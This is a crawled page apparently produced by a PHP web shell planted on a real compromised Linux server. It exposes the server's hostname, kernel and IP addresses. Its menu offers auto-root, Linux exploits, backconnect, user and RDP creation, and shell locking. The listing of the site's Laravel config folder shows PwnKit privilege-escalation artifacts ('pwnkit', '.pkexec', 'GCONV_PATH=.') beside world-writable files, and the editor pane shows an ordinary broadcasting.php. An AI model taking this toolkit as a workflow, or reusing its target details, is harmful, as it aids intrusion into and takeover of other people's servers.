Linux srv1.sbit.com.bd 5.14.0-503.21.1.el9_5.x86_64 #1 SMP PREEMPT_DYNAMIC Sun Jan 12 09:45:05 EST 2025 x86_64
Apache
: 192.99.39.68 | : 216.73.216.165
Cant Read [ /etc/named.conf ]
8.2.29
gzmcfenigov
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
gzmcfenigov /
public_html /
config /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
app.php
8.05
KB
-rw-rw-rw-
auth.php
4.21
KB
-rw-rw-rw-
backup.php
9.88
KB
-rw-rw-rw-
broadcasting.php
2.04
KB
-rw-rw-rw-
cache.php
3.2
KB
-rw-rw-rw-
cors.php
846
B
-rw-rw-rw-
database.php
6.43
KB
-rw-rw-rw-
datatables.php
4.02
KB
-rw-rw-rw-
debugbar.php
11.39
KB
-rw-rw-rw-
dompdf.php
11.21
KB
-rw-rw-rw-
filesystems.php
3.24
KB
-rw-rw-rw-
hashing.php
1.54
KB
-rw-rw-rw-
logging.php
3.7
KB
-rw-rw-rw-
mail.php
3.69
KB
-rw-rw-rw-
permission.php
5.45
KB
-rw-rw-rw-
pwnkit
10.99
KB
-rwxr-xr-x
queue.php
2.84
KB
-rw-rw-rw-
sanctum.php
2.24
KB
-rw-rw-rw-
services.php
979
B
-rw-rw-rw-
session.php
6.86
KB
-rw-rw-rw-
sweetalert.php
9.34
KB
-rw-rw-rw-
view.php
1.03
KB
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : broadcasting.php
<?php return [ /* |-------------------------------------------------------------------------- | Default Broadcaster |-------------------------------------------------------------------------- | | This option controls the default broadcaster that will be used by the | framework when an event needs to be broadcast. You may set this to | any of the connections defined in the "connections" array below. | | Supported: "pusher", "ably", "redis", "log", "null" | */ 'default' => env('BROADCAST_DRIVER', 'null'), /* |-------------------------------------------------------------------------- | Broadcast Connections |-------------------------------------------------------------------------- | | Here you may define all of the broadcast connections that will be used | to broadcast events to other systems or over websockets. Samples of | each available type of connection are provided inside this array. | */ 'connections' => [ 'pusher' => [ 'driver' => 'pusher', 'key' => env('PUSHER_APP_KEY'), 'secret' => env('PUSHER_APP_SECRET'), 'app_id' => env('PUSHER_APP_ID'), 'options' => [ 'host' => env('PUSHER_HOST') ?: 'api-'.env('PUSHER_APP_CLUSTER', 'mt1').'.pusher.com', 'port' => env('PUSHER_PORT', 443), 'scheme' => env('PUSHER_SCHEME', 'https'), 'encrypted' => true, 'useTLS' => env('PUSHER_SCHEME', 'https') === 'https', ], 'client_options' => [ // Guzzle client options: https://docs.guzzlephp.org/en/stable/request-options.html ], ], 'ably' => [ 'driver' => 'ably', 'key' => env('ABLY_KEY'), ], 'redis' => [ 'driver' => 'redis', 'connection' => 'default', ], 'log' => [ 'driver' => 'log', ], 'null' => [ 'driver' => 'null', ], ], ];
Close